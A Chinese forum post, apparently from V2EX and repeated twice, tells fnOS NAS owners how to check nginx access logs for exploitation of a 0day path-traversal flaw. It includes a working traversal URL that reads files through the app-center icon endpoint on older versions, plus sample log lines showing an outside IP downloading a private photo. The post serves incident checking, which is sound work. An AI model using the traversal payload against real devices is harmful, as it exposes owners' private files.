关于飞牛 0day 漏洞是否被攻击情况查看
在开始之前,请先确认,是否升级到 1.1.18 系统,如果升级了系统,会导致 access.log 文件被覆盖,无法查询,忽略此方法
fnOS 的 nginx 日志在
1.1.15 之前版本,查看路径,
查看:
如果出现
如果出现
那就中奖了,解析 180.000.000.236 在 02 日/2 月/2026 年 16:48:53 访问了/vol2/1000/Photos/%E9%9D%99%E5%A9%A7/IMG_20180209_125335.jpg 文件 一次类推,可以了解到自己哪些文件已泄露,做好排查工作。
via V2EX - 技术 (author: liyouxiu)
在开始之前,请先确认,是否升级到 1.1.18 系统,如果升级了系统,会导致 access.log 文件被覆盖,无法查询,忽略此方法
fnOS 的 nginx 日志在
/usr/trim/nginx/logs/access.log1.1.15 之前版本,查看路径,
http://ip:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../usr/trim/nginx/logs/access.log查看:
access.log,搜索关键字:app-center-static/serviceicon/myapp如果出现
192.168.15.111 - - [01/Feb/2026:22:43:30 +0800] "GET /app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../ HTTP/1.1" 404 说明访问遇到了 404 ,漏洞已被修改,不用担心如果出现
180.000.000.236 - - [02/Feb/2026:16:48:53 +0800] "GET /app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../vol2/1000/Photos/%E9%9D%99%E5%A9%A7/IMG_20180209_125335.jpg HTTP/1.1" 200 84235 那就中奖了,解析 180.000.000.236 在 02 日/2 月/2026 年 16:48:53 访问了/vol2/1000/Photos/%E9%9D%99%E5%A9%A7/IMG_20180209_125335.jpg 文件 一次类推,可以了解到自己哪些文件已泄露,做好排查工作。
via V2EX - 技术 (author: liyouxiu)
